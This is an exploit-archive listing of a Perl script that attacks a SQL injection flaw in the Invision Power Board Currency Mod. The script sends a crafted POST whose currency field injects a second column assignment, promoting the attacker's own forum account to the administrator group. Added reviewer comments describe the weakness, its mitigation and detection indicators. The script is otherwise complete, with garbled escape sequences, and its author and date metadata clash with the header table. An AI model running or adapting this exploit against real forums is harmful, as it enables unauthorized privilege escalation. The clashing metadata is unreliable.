CVE | Category | Price | Severity |
---|---|---|---|
CVE-2005-1906 | CWE-89 | $100 - $300 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
NitroSecurity | High | Remote | 2010-03-16 |
# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: www.invisionpower.com <http://www.invisionpower.com>
# Version: 1.3
# Tested on: 1.3
# CVE:
# Code:
#!/usr/bin/perl
#########################################################################
# Invision Power Board Currency Mod(edit) SQL injection.                #
# Bug found by Pr0T3cT10n, [email protected] (address masked by the page) #
# The exploit is updating your user to an admin account                 #
# **YOU SHOULD HAVE CURRENCY EDIT ACCESS!**                             #
#########################################################################
#
# Reviewer notes (defensive reading of this listing):
#
# * Weakness class: SQL injection (CWE-89). According to the author's own
#   SQL comment further down, the `currency` form field ends up in the SET
#   clause of an UPDATE on ibf_members without being restricted to a
#   number, so a comma inside the value adds a second column assignment.
# * Preconditions visible in the script: the request is authenticated
#   (member_id / pass_hash cookie) and the header states the account must
#   already hold currency-edit access. This is a privilege escalation by
#   an existing user, not an unauthenticated attack.
# * Mitigation: coerce `currency` to an integer (or bind it as a query
#   parameter) before it reaches the UPDATE, and never let request data
#   decide which columns are written. Removing or updating the mod closes
#   the path entirely.
# * Detection: look for POSTs to act=modcp&CODE=docurrencyedit whose
#   `currency` value contains anything other than digits (an encoded
#   comma, %2C, in this sample), for the fixed User-Agent string used
#   below, and for unexpected mgroup changes in ibf_members.
# * String literals are reproduced exactly as they appear on the page,
#   including the "n" / "rn" sequences, which look like extraction residue.
# * The script runs without `use strict` / `use warnings` and uses package
#   globals throughout.

use IO::Socket;
use Digest::MD5 qw(md5_hex);

# Positional arguments: target host, forum path, the caller's own member id,
# and the caller's own password. None of them are validated.
$host = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];
$passwd = $ARGV[3];

# Print the usage banner and stop when the fourth argument is missing or
# evaluates to false.
if(!$ARGV[3]) {
    print "#################################################n";
    print "## IPB Currency Mod SQL injection Exploit. ##n";
    print "## Discoverd By Pr0T3cT10n. ##n";
    print "#################################################n";
    print "$0 [host] [path] [your id] [your passowrd]n";
    print "$0 host.com /forum 567 123456n";
    print "#################################################n";
    exit();
}

# Plain TCP connection to port 80; the port is hard-coded and no TLS is used.
print "[~] Connecting $host:80...n";
$socket = IO::Socket::INET->new( Proto => "tcp" , PeerAddr => $host , PeerPort => "80") or die("[-] Connection faild.n");
print "[+] Connected.n[~] Sending POST information...n";

# Hand-built HTTP request. $pack is never declared; `.=` on the undefined
# global starts from the empty string.
# Request line: the moderator control panel action that edits a member's
# currency, with the caller's own id as the target member.
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1rn";
$pack.= "Host: " . $host . "rn";
# Fixed, non-browser User-Agent: a usable log indicator for this script.
$pack.= "User-Agent: No_Agentrn";
$pack.= "Accept: */*rn";
# Session cookie: the member id plus the MD5 hex digest of the password as
# computed here. Presumably this is what the board accepts as pass_hash;
# that is not verifiable from this listing.
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "rn";
$pack.= "Keep-Alive: 300rn";
$pack.= "Connection: keep-alivern";
$pack.= "Content-Type: application/x-www-form-urlencodedrn";
# 24 is the byte length of the form body assigned on the next statement.
$pack.= "Content-Length: 24rnrn";
# Form body: the `currency` value carries an encoded space and comma (%20,
# %2C) followed by a second assignment. mgroup=4 is presumably the
# administrator group id, going by the header's claim; confirm against the
# board's group table.
$pack.= "currency=1%20%2Cmgroup=4";
# Resulting statement as given by the author:
#UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'
print $socket $pack;

# Read the response line by line and report success when a line contains
# this exact table tag. Presumably it is markup from the mod's confirmation
# page; it proves only that the tag was returned, not that the row changed.
while($res = <$socket>) {
    if($res =~ /<table align='center' cellpadding="4" class="tablefill">/) {
        print("[+] succeed.n");
        exit();
    }
}

# Reached only when the socket is exhausted without seeing the marker.
print("[-] Faild.n");
exit();